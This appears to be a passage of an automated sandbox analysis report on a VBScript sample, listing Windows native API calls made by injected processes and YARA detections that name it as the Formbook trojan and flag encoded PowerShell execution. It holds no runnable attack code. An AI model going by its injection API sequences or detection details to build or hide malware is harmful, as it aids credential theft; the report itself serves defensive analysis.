Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462B60 NtClose, 20_2_22462B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462BE0 NtQueryValueKey, 20_2_22462BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462B80 NtQueryInformationFile, 20_2_22462B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462BA0 NtEnumerateValueKey, 20_2_22462BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224639B0 NtGetContextThread, 20_2_224639B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462E30 NtWriteVirtualMemory, 20_2_22462E30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462EE0 NtQueueApcThread, 20_2_22462EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462F60 NtCreateProcessEx, 20_2_22462F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462FA0 NtQuerySection, 20_2_22462FA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462C60 NtCreateKey, 20_2_22462C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462C00 NtQueryInformationProcess, 20_2_22462C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462CC0 NtQueryVirtualMemory, 20_2_22462CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462CF0 NtOpenProcess, 20_2_22462CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22463D70 NtOpenThread, 20_2_22463D70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462D00 NtSetInformationFile, 20_2_22462D00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22463D10 NtOpenProcessToken, 20_2_22463D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22462DB0 NtEnumerateKey, 20_2_22462DB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0667CEB4 Sleep,NtProtectVirtualMemory, 20_2_0667CEB4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2235A036 NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread, 20_2_2235A036
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2239A036 NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread, 20_2_2239A036
Source: C:\Windows\explorer.exe Code function: 22_2_0B313232 NtCreateFile,NtReadFile, 22_2_0B313232
Source: C:\Windows\explorer.exe Code function: 22_2_0B314E12 NtProtectVirtualMemory, 22_2_0B314E12
Source: C:\Windows\explorer.exe Code function: 22_2_0B314E0A NtProtectVirtualMemory, 22_2_0B314E0A
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044835C0 NtCreateMutant,LdrInitializeThunk, 25_2_044835C0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04483090 NtSetValueKey,LdrInitializeThunk, 25_2_04483090
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482C60 NtCreateKey,LdrInitializeThunk, 25_2_04482C60
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482C70 NtFreeVirtualMemory,LdrInitializeThunk, 25_2_04482C70
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482CA0 NtQueryInformationToken,LdrInitializeThunk, 25_2_04482CA0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482D00 NtSetInformationFile,LdrInitializeThunk, 25_2_04482D00
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482D10 NtMapViewOfSection,LdrInitializeThunk, 25_2_04482D10
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482DD0 NtDelayExecution,LdrInitializeThunk, 25_2_04482DD0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482DF0 NtQuerySystemInformation,LdrInitializeThunk, 25_2_04482DF0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 25_2_04482EA0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482F30 NtCreateSection,LdrInitializeThunk, 25_2_04482F30
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482FE0 NtCreateFile,LdrInitializeThunk, 25_2_04482FE0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482AD0 NtReadFile,LdrInitializeThunk, 25_2_04482AD0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482AF0 NtWriteFile,LdrInitializeThunk, 25_2_04482AF0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482B60 NtClose,LdrInitializeThunk, 25_2_04482B60
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482BE0 NtQueryValueKey,LdrInitializeThunk, 25_2_04482BE0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 25_2_04482BF0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482BA0 NtEnumerateValueKey,LdrInitializeThunk, 25_2_04482BA0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04484650 NtSuspendThread, 25_2_04484650
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04483010 NtOpenDirectoryObject, 25_2_04483010
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04484340 NtSetContextThread, 25_2_04484340
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482C00 NtQueryInformationProcess, 25_2_04482C00
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482CC0 NtQueryVirtualMemory, 25_2_04482CC0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482CF0 NtOpenProcess, 25_2_04482CF0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04483D70 NtOpenThread, 25_2_04483D70
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04483D10 NtOpenProcessToken, 25_2_04483D10
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482D30 NtUnmapViewOfSection, 25_2_04482D30
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482DB0 NtEnumerateKey, 25_2_04482DB0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482E30 NtWriteVirtualMemory, 25_2_04482E30
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482EE0 NtQueueApcThread, 25_2_04482EE0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482E80 NtReadVirtualMemory, 25_2_04482E80
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482F60 NtCreateProcessEx, 25_2_04482F60
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482F90 NtProtectVirtualMemory, 25_2_04482F90
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482FA0 NtQuerySection, 25_2_04482FA0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482FB0 NtResumeThread, 25_2_04482FB0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044839B0 NtGetContextThread, 25_2_044839B0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482AB0 NtWaitForSingleObject, 25_2_04482AB0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04482B80 NtQueryInformationFile, 25_2_04482B80
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EA350 NtCreateFile, 25_2_001EA350
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EA400 NtReadFile, 25_2_001EA400
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EA480 NtClose, 25_2_001EA480
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EA530 NtAllocateVirtualMemory, 25_2_001EA530
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EA34A NtCreateFile, 25_2_001EA34A
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EA3FA NtReadFile, 25_2_001EA3FA
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EA47B NtClose, 25_2_001EA47B
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EA52A NtAllocateVirtualMemory, 25_2_001EA52A
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041B9DDD NtReadVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtResumeThread,NtClose, 25_2_041B9DDD
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041BA036 NtQueryInformationProcess,NtReadVirtualMemory,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread, 25_2_041BA036
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041B9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 25_2_041B9BAF
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041B9DE2 NtReadVirtualMemory,NtProtectVirtualMemory, 25_2_041B9DE2
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041BA042 NtQueryInformationProcess, 25_2_041BA042
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_041B9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 25_2_041B9BB2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFAAB78C2B2 12_2_00007FFAAB78C2B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFAAB78B506 12_2_00007FFAAB78B506
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0474F1F0 16_2_0474F1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0474FAC0 16_2_0474FAC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0474EEA8 16_2_0474EEA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_08262A60 16_2_08262A60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0274 20_2_224D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B2C0 20_2_2244B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224352A0 20_2_224352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241D34C 20_2_2241D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EA352 20_2_224EA352
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E132D 20_2_224E132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F03E6 20_2_224F03E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243E3F0 20_2_2243E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2247739A 20_2_2247739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DF0CC 20_2_224DF0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E70E9 20_2_224E70E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EF0E0 20_2_224EF0E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B8158 20_2_224B8158
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224FB16B 20_2_224FB16B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2246516C 20_2_2246516C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241F172 20_2_2241F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22420100 20_2_22420100
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224CA118 20_2_224CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E81CC 20_2_224E81CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F01AA 20_2_224F01AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243B1B0 20_2_2243B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E16CC 20_2_224E16CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244C6E0 20_2_2244C6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22454750 20_2_22454750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430770 20_2_22430770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242C7C0 20_2_2242C7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EF7B0 20_2_224EF7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E2446 20_2_224E2446
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22421460 20_2_22421460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EF43F 20_2_224EF43F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DE4F6 20_2_224DE4F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E7571 20_2_224E7571
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430535 20_2_22430535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F0591 20_2_224F0591
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224CD5B0 20_2_224CD5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EFA49 20_2_224EFA49
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E7A46 20_2_224E7A46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A3A6C 20_2_224A3A6C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DDAC6 20_2_224DDAC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242EA80 20_2_2242EA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224CDAAC 20_2_224CDAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22475AA0 20_2_22475AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EAB40 20_2_224EAB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EFB76 20_2_224EFB76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E6BD7 20_2_224E6BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A5BF0 20_2_224A5BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2246DBF9 20_2_2246DBF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244FB80 20_2_2244FB80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22432840 20_2_22432840
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243A840 20_2_2243A840
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249D800 20_2_2249D800
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224338E0 20_2_224338E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245E8F0 20_2_2245E8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224168B8 20_2_224168B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22439950 20_2_22439950
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B950 20_2_2244B950
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22446962 20_2_22446962
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224329A0 20_2_224329A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224FA9A6 20_2_224FA9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430E59 20_2_22430E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EEE26 20_2_224EEE26
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EEEDB 20_2_224EEEDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22442E90 20_2_22442E90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224ECE93 20_2_224ECE93
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22439EB0 20_2_22439EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A4F40 20_2_224A4F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EFF09 20_2_224EFF09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22472F28 20_2_22472F28
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22450F30 20_2_22450F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22422FC8 20_2_22422FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243CFE0 20_2_2243CFE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431F92 20_2_22431F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EFFB1 20_2_224EFFB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22430C00 20_2_22430C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A9C32 20_2_224A9C32
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22420CF2 20_2_22420CF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EFCF2 20_2_224EFCF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D0CB5 20_2_224D0CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22433D40 20_2_22433D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E1D5A 20_2_224E1D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E7D73 20_2_224E7D73
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243AD00 20_2_2243AD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244FDC0 20_2_2244FDC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242ADE0 20_2_2242ADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22448DBF 20_2_22448DBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2235A036 20_2_2235A036
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2235B232 20_2_2235B232
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22355B30 20_2_22355B30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22355B32 20_2_22355B32
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22351082 20_2_22351082
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22358912 20_2_22358912
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22352D02 20_2_22352D02
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2235E5CD 20_2_2235E5CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2239A036 20_2_2239A036
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2239B232 20_2_2239B232
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22395B30 20_2_22395B30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22395B32 20_2_22395B32
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22391082 20_2_22391082
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22398912 20_2_22398912
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22392D02 20_2_22392D02
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2239E5CD 20_2_2239E5CD
Source: C:\Windows\explorer.exe Code function: 22_2_09350912 22_2_09350912
Source: C:\Windows\explorer.exe Code function: 22_2_0934AD02 22_2_0934AD02
Source: C:\Windows\explorer.exe Code function: 22_2_093565CD 22_2_093565CD
Source: C:\Windows\explorer.exe Code function: 22_2_09352036 22_2_09352036
Source: C:\Windows\explorer.exe Code function: 22_2_09349082 22_2_09349082
Source: C:\Windows\explorer.exe Code function: 22_2_0934DB30 22_2_0934DB30
Source: C:\Windows\explorer.exe Code function: 22_2_0934DB32 22_2_0934DB32
Source: C:\Windows\explorer.exe Code function: 22_2_09353232 22_2_09353232
Source: C:\Windows\explorer.exe Code function: 22_2_09AFD5CD 22_2_09AFD5CD
Source: C:\Windows\explorer.exe Code function: 22_2_09AF1D02 22_2_09AF1D02
Source: C:\Windows\explorer.exe Code function: 22_2_09AF7912 22_2_09AF7912
Source: C:\Windows\explorer.exe Code function: 22_2_09AF0082 22_2_09AF0082
Source: C:\Windows\explorer.exe Code function: 22_2_09AF9036 22_2_09AF9036
Source: C:\Windows\explorer.exe Code function: 22_2_09AF4B32 22_2_09AF4B32
Source: C:\Windows\explorer.exe Code function: 22_2_09AF4B30 22_2_09AF4B30
Source: C:\Windows\explorer.exe Code function: 22_2_09AFA232 22_2_09AFA232
Source: C:\Windows\explorer.exe Code function: 22_2_0B313232 22_2_0B313232
Source: C:\Windows\explorer.exe Code function: 22_2_0B30DB30 22_2_0B30DB30
Source: C:\Windows\explorer.exe Code function: 22_2_0B30DB32 22_2_0B30DB32
Source: C:\Windows\explorer.exe Code function: 22_2_0B310912 22_2_0B310912
Source: C:\Windows\explorer.exe Code function: 22_2_0B30AD02 22_2_0B30AD02
Source: C:\Windows\explorer.exe Code function: 22_2_0B3165CD 22_2_0B3165CD
Source: C:\Windows\explorer.exe Code function: 22_2_0B312036 22_2_0B312036
Source: C:\Windows\explorer.exe Code function: 22_2_0B309082 22_2_0B309082
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C85F64 25_2_00C85F64
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04502446 25_2_04502446
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04441460 25_2_04441460
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450F43F 25_2_0450F43F
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044FE4F6 25_2_044FE4F6
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04507571 25_2_04507571
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04450535 25_2_04450535
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04510591 25_2_04510591
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044ED5B0 25_2_044ED5B0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_045016CC 25_2_045016CC
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0446C6E0 25_2_0446C6E0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04474750 25_2_04474750
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04450770 25_2_04450770
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0444C7C0 25_2_0444C7C0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450F7B0 25_2_0450F7B0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044FF0CC 25_2_044FF0CC
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044570C0 25_2_044570C0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450F0E0 25_2_0450F0E0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_045070E9 25_2_045070E9
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044D8158 25_2_044D8158
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0448516C 25_2_0448516C
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0443F172 25_2_0443F172
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0451B16B 25_2_0451B16B
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04440100 25_2_04440100
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044EA118 25_2_044EA118
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_045081CC 25_2_045081CC
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0445B1B0 25_2_0445B1B0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_045101AA 25_2_045101AA
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044F0274 25_2_044F0274
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0446B2C0 25_2_0446B2C0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044D02C0 25_2_044D02C0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044F12ED 25_2_044F12ED
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044552A0 25_2_044552A0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450A352 25_2_0450A352
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0443D34C 25_2_0443D34C
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0450132D 25_2_0450132D
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0445E3F0 25_2_0445E3F0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_045103E6 25_2_045103E6
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_0449739A 25_2_0449739A
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_04450C00 25_2_04450C00
Source: C:\Windows\SysWOW64\raserver.exe Code function: String function: 044BEA12 appears 86 times
Source: C:\Windows\SysWOW64\raserver.exe Code function: String function: 044CF290 appears 105 times
Source: C:\Windows\SysWOW64\raserver.exe Code function: String function: 04485130 appears 36 times
Source: C:\Windows\SysWOW64\raserver.exe Code function: String function: 00C90FD2 appears 117 times
Source: C:\Windows\SysWOW64\raserver.exe Code function: String function: 04497E54 appears 96 times
Source: C:\Windows\SysWOW64\raserver.exe Code function: String function: 0443B970 appears 265 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 224AF290 appears 103 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 22465130 appears 36 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 22477E54 appears 96 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2241B970 appears 265 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2249EA12 appears 82 times
Source: birectangular.vbs Initial sample: Strings found which are bigger than 50
Source: amsi32_7748.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 00000016.00000002.2539715422.000000000B32B000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
